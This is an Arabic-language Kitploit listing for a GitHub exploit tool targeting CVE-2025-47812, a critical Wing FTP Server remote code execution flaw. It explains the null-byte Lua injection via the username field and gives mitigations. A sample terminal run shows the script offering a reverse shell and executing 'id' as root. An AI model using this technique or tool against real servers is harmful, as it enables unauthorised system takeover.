Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
أدوات/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-47812 – ثغرة RCE حرجة في Wing FTP Server 🛡️

🔎 نظرة عامة:

CVE-2025-47812 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة تؤثر على إصدارات Wing FTP Server السابقة للإصدار 7.4.4. تم اكتشافها بواسطة باحث أمني وتم التأكيد على أنها تُستغل بنشاط في البيئات الفعلية.


🧱 السبب الجذري:

تكمن الثغرة في منطق المصادقة في Wing FTP Server، وتحديدًا في طريقة تعامله مع البايتات الفارغة (\0) في معامل username.

يمكن للمهاجمين حقن أكواد Lua عشوائية عبر حقل اسم المستخدم، ويقوم الخادم بكتابتها في ملف الجلسة. وعند معالجة ملف الجلسة لاحقًا، يتم تنفيذ كود Lua المحقون، مما يسمح للمهاجمين بتشغيل أوامر على مستوى النظام.


🚨 التأثير:

  • الخطورة: درجة CVSS 10.0 (حرجة)
  • الوصول المطلوب: يكفي الوصول غير المصادق عليه أو المجهول
  • الاستغلال: تم تأكيد استغلال نشط
  • الصلاحيات المكتسبة: يعمل الكود بصلاحيات SYSTEM (ويندوز) أو root (لينكس/ماك)
  • الأنظمة المتأثرة: ويندوز ولينكس وmacOS

🔧 التخفيف:

تنزيل الأداة
  • قم بالتحديث فورًا إلى Wing FTP Server الإصدار 7.4.4 أو أحدث.
  • تأكد من أن خوادم FTP العامة لا تعرض /loginok.html لشبكات غير موثوقة.
  • راقب السجلات بحثًا عن أسماء مستخدمين غير عادية أو حقن أكواد Lua.
  • طبّق تقسيم الشبكة لعزل خدمات FTP عن البنية التحتية الداخلية.

💀 الاستغلال:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
   CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>


------ Response End ------

⚠️ إخلاء المسؤولية

هذا الاستغلال مُقدَّم لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.